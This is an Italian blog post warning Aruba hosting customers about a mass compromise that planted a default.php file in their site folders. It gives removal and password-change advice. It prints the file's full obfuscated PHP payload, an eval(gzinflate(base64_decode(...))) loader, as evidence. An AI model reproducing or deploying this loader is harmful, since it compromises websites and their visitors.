Aruba attacco Massivo e problemi di sicurezza

Da Libroseo

Avete anche voi un sito su Aruba?

Anche voi non visualizzate più nulla del vostro sito web?

Bene siete stati colpiti da un attacco avvenuto sui server Aruba per gli hosting Windows.

La cosa che non mi riesco a spiegare è perchè nessuno è stato avvisato e soprattutto perchè ARUBA non ha ne avvisato i clienti ne tantomeno risolto il problema sull’hosting.

In poche parole si tratta di un file defaul.php che è stato inserito in ogni cartella del vostro sito web hostato su aruba.

La cosa più immediata da fare è cancellare il file default.php inserito sul vostro hosting.

Ecco il codice sorgente del file:

   1: <;?php eval(gzinflate(base64_decode("DZW1rsUIEgX/ZaMZOTCTNj
   2: Iz29eQrMzM7K/fl7d0gipVl1c6/FN/7VQN6VH+k6V7SWD/K8p8Lsp//sMnrsy
   3: vbszU0QWtx7rHvFAJXBd6nkrT+OFO3WWnZWXtkq/02mWpNuCDARLT/VSCwuRn
   4: MYfZoN4in9Z+IEjpwrUtVkarEBlcMG4OSZsU2hUVEoyNcXeeUQHIw53TM9nl0X
   5: YAUKJ30v0M4lTy/btZldu8QENe4tR+fHNHmY9FSTMyez/kRauHm2U1UkOjv8ZRuz
   6: N1yHpPDe9nseSt9JwyUUUzltDT46fD0ZZz11p4eFEkrX+bquHXaJUdeFO3BAcpV6
   7: OD9ijs4OCnnmwKjWl6TViMiJpRaolmTCJ9b717XFrkHNWoj73hWdXyQj/wX5lb
   8: PS0dMNxZ9LthsAdvfrZ6L/W5FX8qBKDzv1NrqjjBw6RXEfMaycBL8dG5yBk8WC
   9: Pox3aYplOEurajDF1XsqoSbwwDV3M3TwF4LD3P/YJfloi9XQy1EMP6YQ7UdhXX
  10: gptzNJMl9E6sP4seQ790BEa6eVXIsSM7jP3RlxdYTZ9TRAQ4T7DBxcCJQEUkr/
  11: OhSGmNLLKyDL7mHTIVuJHVnbOBGlm8L6rvsKYQkkPyyqgZ5lhjVhI0OSULeFWk
  12: kajmeO58YijUIESCCP2qXvsWmThgvOC34yTsjDMslt1Y20EidLTwFGXl3ucUo1
  13: pfcBNEC+clnwXRRm8AcfGNO9BvyiOpwoXDt7Hx9FyBPi6Zldzs9eVsrieK1pfP
  14: AFxXum/cNi+20kvZmA+cwqPF1uKNMdqSyXD4DCxjKZVhJ8Khj1xoYUwCQpAk0z
  15: 3Qe9RY4o7Lmwh7KlOxQriAJGu4MmaOJ/
  16: /sPrd4O/bO8izdeGH8R4vfRAU7xXNls0NRT6qk8gpGX7OSF/QEYv7GUzvhb/nw
  17: bhzOghxVfrOYjIDXXlvVhyQ/YDor3zP1tQ0cwfvlP2lkM4PCrd1mgMUBp13aR2
  18: JQPP/qE4r+hqiZcy1i7y2SkBuEAY17MA5CQkA2+PMjMAPq87COKn3lSYT8DHcB
  19: ig2hD8ba7dIVyrEGG8eoeeYFiFSdaCzq47dQDkKWHiZyaNifhSsNT68IMTdhzV
  20: 5nCtC93w0OzLYB8tg9ZL0bAra82YU6Yr0dGXK/C/YsATylxZWJil54CHQueu6R
  21: wl2YUkI4gLD3bt9RF1n/cmtO5mQ0FUZRuXDjtTvO1ppXcC6VoN8YYN6KNq2dyG
  22: XHY+HcHDMrrkyIUdyDfJFJDuPth6SWI51joy3PI8n06O/B61aVOJS5VAjsw1MZ
  23: WKjYq+VfqE/skm44NkZrRTEyIWzmXSR2CLsjkAvsmR7LWXdOg94HnZ4sORr8/u
  24: Q6ohi9jIfIRZzDbV+DuZcmzW1rrCYTrz1JQH8QLSeyMFWmHObCsD1f0LxVuz60
  25: /bHO19rVfhlxTRdF2mgXhjBiOZJ1sAth137bY3caJq1n9chjhbGpLSweAkzkfg
  26: qnH1Zys7HzL8CO4zRJt53wCrac09iaF6scbzWjQHxfxG2qWHKvCd/OL2tUZLTt
  27: rRDU8r8Lql19L0xJLIYHuhGKbPnlUIPE0Azl0bzFOot4X/15NgIRekFJDtzDCT
  28: JwGX0/+r5enk0Jyqa6aHpWmdbwkh4vsh7RCBzQWwdDuz/Vc2r2KO3THjyRkgh+
  29: 2adjhWs23z3sy0/UXk4B93tp0dfwrEqA1jifdCFMBkqPc+qOLs6nAtGKP+QGr
  30: kA6BPjruqY0pCG7dmrOzE6FnNO9VswKqUjw6OH6t4CrfczbNts3e80BknpWWP
  31: kSrMMp2r/ACZARGjgRLBzsbIGJBeoh3deVD8uwqBc61Dv4d9tapXjTHoyku9G
  32: SZ3x2sLhzhFCJqQiVfOem2niFcdDA/EBlroJ4Q807K6CFHWoM4ZukkLDyOCEB
  33: I05knbTy9vamQqpNYdH583RkN7RrYmi9SVyGfy+nuRjAtHiAHxASmI6ulaITx
  34: O1fe5O8P+sfYUAanhz77Wgt7px4PBawLdZ4M1RAc0/sTpapuYd1/W2AbUbTcH
  35: PQAuq8zCm6uznYVZmUza6THWduW6yFuQcE+HrYxNWN+A8E4aKfrqgmithkRZt
  36: mizaRyw2yVmDf9Xtvxj1y3+pj8FK2JuHNrPFjHeX3uCHpxLqi6wmjSgYvjRhj
  37: bo45kHOWX+dfSx8DnFeF2SL1PYH8PQKCBce+QdpAXEthFgEJkJlY4sNM3xFlm
  38: jMK8BQ6biSbNZ40Xlbz3947g2d3FTXv4srcS2qEJoad4iY6uOKBXras+z//FZ
  39: y/39C/oi9M884zOOk1QdRnivySYMkif1Z4d/TID+D9Ws2BqPJc9RRyAdirX78
  40: +wX09lJn7/40rjNAiCKGqDlPyff//997//Bw=="))); ?>

Dopodichè cambiare le passowrd FTP e di accesso dei vostri siti web.

Mi dispiace dirlo ma aruba che DELUSIONE IMMENSA

Siete stati colpiti anche voi? fatecelo sapere…

.